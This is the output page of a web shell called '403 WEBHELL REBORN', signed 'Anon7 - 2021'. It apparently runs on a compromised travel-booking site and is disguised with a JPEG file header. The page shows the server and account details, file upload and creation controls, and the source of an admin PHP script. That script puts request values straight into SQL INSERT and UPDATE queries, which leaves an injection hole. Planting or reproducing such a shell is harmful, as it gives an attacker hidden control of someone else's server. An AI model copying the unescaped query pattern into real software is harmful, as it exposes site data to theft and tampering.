ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/admin/good/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/admin/good/mainViewProductProc.php
<?php
	include "../include/top_proc.html";
	include "_common.php";

	$isHotelSection = 'N';
	if(isset($_POST['hotelSection']) && $_POST['hotelSection'] == 'on'){
		$isHotelSection = 'Y';
	}

	$tableName = "mainViewSection";

	$ins_id = $TK_MEMBER['mb_id'];

	$b_uid_s = (int) $b_uid_s;

	/*if(devCookie()){
		p($b_uid_s);
		exit;
	}*/

	if($SqlType == "insCategory"){
		$sql = "INSERT INTO {$tableName} SET b_uid_s = {$b_uid_s}, hotelSection = '{$isHotelSection}', lang = '{$lang}', title = '{$title}', description = '{$description}', onePageCnt = {$onePageCnt},  ins_id = '{$ins_id}', ins_dt = now()";

		if(db_query($sql)){
			echo "<script>location.href='/admin/good/mainViewProduct.html?lang={$lang}';</script>";
		}else{
			echo "<script>alert('입력실패');location.href='/admin/good/mainViewProduct.html?lang={$lang}';</script>";
		}

	}else if($SqlType == 'modifyCategory'){

		$modifyMainViewSectionID = (int) $_POST['modifyMainViewSectionID'];
		$sql = "UPDATE {$tableName} SET b_uid_s = {$b_uid_s}, hotelSection = '{$isHotelSection}', lang = '{$lang}', title = '{$title}', description = '{$description}', onePageCnt = {$onePageCnt}, ins_id = '{$ins_id}', ins_dt = now() WHERE mainViewSectionID = {$modifyMainViewSectionID}";
		if(db_query($sql)){
			echo "<script>location.href='/admin/good/mainViewProduct.html?lang={$lang}';</script>";
		}else{
			echo "<script>alert('입력실패');location.href='/admin/good/mainViewProduct.html?lang={$lang}';</script>";
		}

	}
?>

Anon7 - 2021